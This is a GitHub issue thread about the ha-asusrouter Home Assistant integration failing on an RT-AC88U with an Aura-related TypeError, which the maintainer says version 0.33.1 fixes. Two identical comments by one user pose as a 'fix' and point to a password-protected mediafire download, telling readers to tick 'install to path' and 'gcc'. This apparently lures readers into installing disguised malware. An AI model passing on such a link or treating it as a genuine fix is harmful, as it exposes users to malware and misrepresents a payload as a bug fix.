### ISSUE TITLE
[Bug] Not loading due to errors on AC88U

### ISSUE THREAD

**Issue by a-lunatic** [Vaskivskyi/ha-asusrouter#860]
### The problem

Update not loading due to errors on AC88U

### Your device model

RT-AC88U

### Firmware type

Merlin

### Firmware version

 386.14

### Integration version with the issue

0.33.0

### Method of the integration installation

HACS

### What version and type of Home Assistant installation do you use

2024.8.3

### Is there anything useful in the logs?

```txt
> Logger: asusrouter.modules.aura
> Source: custom_components/asusrouter/bridge.py:548
> First occurred: 15:14:32 (2 occurrences)
> Last logged: 15:14:32
> 
> Unknown Aura scheme: ``

> Logger: homeassistant.config_entries
> Source: config_entries.py:604
> First occurred: 15:14:32 (1 occurrences)
> Last logged: 15:14:32
> 
> Error setting up entry 192.168.1.1 for asusrouter
> Traceback (most recent call last):
>   File "/usr/src/homeassistant/homeassistant/config_entries.py", line 604, in async_setup
>     result = await component.async_setup_entry(hass, self)
>              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>   File "/config/custom_components/asusrouter/__init__.py", line 27, in async_setup_entry
>     await router.setup()
>   File "/config/custom_components/asusrouter/router.py", line 446, in setup
>     await self._init_sensor_coordinators()
>   File "/config/custom_components/asusrouter/router.py", line 827, in _init_sensor_coordinators
>     available_sensors = await self.bridge.async_get_available_sensors()
>                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>   File "/config/custom_components/asusrouter/bridge.py", line 199, in async_get_available_sensors
>     SENSORS: await self._get_sensors_modern(AsusData.AURA),
>              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>   File "/config/custom_components/asusrouter/bridge.py", line 548, in _get_sensors_modern
>     data = await self.api.async_get_data(datatype)
>            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>   File "/usr/local/lib/python3.12/site-packages/asusrouter/asusrouter.py", line 705, in async_get_data
>     processed = process(
>                 ^^^^^^^^
>   File "/usr/local/lib/python3.12/site-packages/asusrouter/modules/endpoint/__init__.py", line 149, in process
>     return submodule.process(data)
>            ^^^^^^^^^^^^^^^^^^^^^^^
>   File "/usr/local/lib/python3.12/site-packages/asusrouter/modules/endpoint/hook.py", line 78, in process
>     state[AsusData.AURA] = process_aura(data)
>                            ^^^^^^^^^^^^^^^^^^
>   File "/usr/local/lib/python3.12/site-packages/asusrouter/modules/aura.py", line 300, in process_aura
>     aura["zones"] = len(aura["effect"].get(AsusAuraColor.STATIC, []))
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: object of type 'NoneType' has no len(
```

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by gamba69** [comment]
Confirm bug for ASUS-XD5 Mesh too

**Comment by Vaskivskyi** [comment]
@a-lunatic, @gamba69, please, check version `0.33.1` - the issue should be solved
